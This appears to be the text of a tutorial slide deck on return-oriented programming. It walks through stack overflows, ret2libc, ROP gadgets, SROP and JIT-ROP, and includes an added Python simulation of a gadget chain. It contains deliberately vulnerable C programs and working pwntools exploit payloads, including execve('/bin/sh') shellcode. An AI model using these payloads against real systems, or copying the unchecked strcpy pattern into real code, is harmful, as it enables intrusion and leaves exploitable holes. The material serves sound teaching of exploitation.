ROP and its friends
by Rakesh Paruchuri
CONTENTS
> WHAT IS ROP
> THE NEED FOR ROP
> ROP vs RET2LIBC
> FRIENDS
WHAT IS ROP?
→ return oriented programming
→ takes advantage of a buffer overflow
→ gains control over the instruction pointer
→ chains gadgets together
NEED FOR ROP
TO EXPLOIT CODE WE NEED CODE EXECUTION:
→ overflow a buffer on the stack
→ overwrite the saved return address
→ get control over EIP
LET'S GIVE A TRY

#include <stdio.h>
#include <string.h>   /* needed for strcpy */

int main(int argc, char **argv) {
    char buffer[50];
    strcpy(buffer, argv[1]);   /* no length check: a long argv[1] runs past the buffer into saved EBP/EIP */
    return 0;
}

Exploit (Python 2 pwntools, as on the slide):

from pwn import *
payload = ''
# execve("/bin/sh") shellcode, placed at the start of the buffer
payload += '\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh'
payload += 'A'*16              # padding up to the saved return address
payload += p32(0xffffd676)     # saved EIP -> hard-coded stack address of the buffer
print payload
RETURN TO LIBC
NX: protection mechanism that makes the stack NOT EXECUTABLE. The stack can still be corrupted and EIP still controlled, so why not point EIP at something that already exists and can spawn a shell?
RETURN TO LIBC
→ assuming libc is at a fixed address (ASLR OFF)
→ pad "blah blah" into the buffer to reach the saved EIP
→ overwrite the saved EIP with &system
→ supply "/bin/sh" as the argument
LET'S GIVE A TRY

#include <stdlib.h>
#include <string.h>   /* needed for strcpy */

int main(int argc, char **argv) {
    char buffer[50];
    strcpy(buffer, argv[1]);
    return 0;
}

EXPLOIT

from pwn import *
payload = ''
payload += 'A'*54               # 50-byte buffer + 4-byte saved EBP
payload += p32(0xf7e48190)      # &system, overwrites the saved EIP
payload += 'BBBB'               # fake return address for system()
payload += p32(0xf7f68a24)      # &'/bin/sh', the argument system() reads from the stack
print payload
ROP
ASLR: protection mechanism that randomizes the addresses of shared libraries and other virtual memory regions, so &system and &'/bin/sh' can no longer be hard-coded.
WHAT IS ROP?
→ return oriented programming
→ re-use pieces of code already in the code segment
→ assemble those pieces into the desired shellcode
GADGETS
A gadget is any instruction sequence ending with a RET instruction.
ret = pop eip (the next word on the stack becomes the next gadget address)
EXAMPLE FOR GADGET
→ a gadget that stores several values in registers (here: pop rbx ; pop rbp ; pop r12 ; ret)
→ you don't lose control over EIP because of the RET instruction at the end of the gadget

Corresponding code for the gadget (rbx_value, rbp_value, r12_value and next_gadget stand for the values you want in those slots):

payload += p64(0x401093)       # gadget address: pop rbx ; pop rbp ; pop r12 ; ret
payload += p64(rbx_value)      # popped into rbx
payload += p64(rbp_value)      # popped into rbp
payload += p64(r12_value)      # popped into r12
payload += p64(next_gadget)    # consumed by the gadget's ret
LET'S GIVE A TRY

#include <stdio.h>
#include <stdlib.h>   /* needed for system */
#include <string.h>   /* needed for strcpy */

static int flag;

void vuln_function1(void) { flag++; }

void vuln_function2(void) { if (flag == 1) system("/bin/sh"); }

int main(int argc, char **argv) {
    char buf[50];
    strcpy(buf, argv[1]);
    return 0;
}

EXPLOIT

from pwn import *
payload = ''
payload += "A"*54
payload += p32(0x0804844d)      # address of vuln_function1 (flag++)
payload += p32(0x08048536)      # pop ebx ; ret
payload += p32(0xdeedbeef)      # filler, popped into ebx
payload += p32(0x0804845f)      # address of vuln_function2 (flag == 1 -> system("/bin/sh"))
print payload
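An added walk-through of why the chain above works, written for this transcript rather than taken from the talk: it models RET literally as "pop eip" on a constructed stack and shows that the pop-ebx gadget is what consumes the filler word, so leaving it out makes the filler itself become EIP. The addresses are the slide's placeholders and the helper names are assumptions.

```python
import struct

# Gadget table for the example program above.  The addresses are the
# placeholder values from the slide's exploit, not from a real binary.
GADGETS = {
    0x0804844d: ("vuln_function1", []),     # flag++ ; ret
    0x08048536: ("pop_ebx_ret", ["ebx"]),   # pop ebx ; ret
    0x0804845f: ("vuln_function2", []),     # if (flag == 1) system("/bin/sh") ; ret
}
OFFSET = 54  # 50-byte buffer + 4-byte saved EBP, as in the slide's 'A'*54

def build_payload(*words):
    """Same layout as the slide's exploit: padding, then p32() of each word."""
    return b"A" * OFFSET + b"".join(struct.pack("<I", w) for w in words)

def words_after_saved_eip(payload, offset=OFFSET):
    """Undo p32(): the bytes that land on the saved-EIP slot and above,
    as little-endian 32-bit words (a trailing partial word is dropped)."""
    tail = payload[offset:]
    return [struct.unpack("<I", tail[i:i + 4])[0]
            for i in range(0, len(tail) - len(tail) % 4, 4)]

def run_chain(chain):
    """Step through the chain, modelling RET as 'pop eip': each gadget
    first consumes its own pops, then the next stack slot becomes EIP.
    Returns (trace, registers, flag)."""
    esp, regs, flag, trace = 0, {}, 0, []
    while esp < len(chain):
        eip, esp = chain[esp], esp + 1            # the epilogue's ret == pop eip
        if eip not in GADGETS:                    # not code: a real CPU faults here
            trace.append("crash@%#010x" % eip)
            break
        name, pops = GADGETS[eip]
        if esp + len(pops) > len(chain):
            trace.append("stack exhausted in " + name)
            break
        for reg in pops:                          # every pop eats one stack slot
            regs[reg], esp = chain[esp], esp + 1
        if name == "vuln_function1":
            flag += 1
        if name == "vuln_function2" and flag == 1:
            name = "vuln_function2 -> system"
        trace.append(name)
    return trace, regs, flag

if __name__ == "__main__":
    good = build_payload(0x0804844d, 0x08048536, 0xdeedbeef, 0x0804845f)
    print(run_chain(words_after_saved_eip(good)))
    # without the pop gadget the filler word becomes EIP and the chain dies
    bad = build_payload(0x0804844d, 0xdeedbeef, 0x0804845f)
    print(run_chain(words_after_saved_eip(bad)))
```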
ROP vs RET2LIBC
[comparison slide: RET2LIBC | ROP]
SROP
→ needs fewer gadgets
→ builds the shellcode by chaining system calls
→ the attacker sets up fake signal frames and triggers returns from signals that the kernel never delivered
[diagram: exploiting ROP, registers EIP and ESP]
[diagram: exploiting SROP, registers EIP and ESP]
JIT-ROP
→ defeats fine-grained address space layout randomization
→ offsets keep varying between runs
→ requires an information leak
→ chaining of gadgets must be done at run time
→ executing shellcode on the stack
→ ret2libc
→ rop
→ srop & jit-rop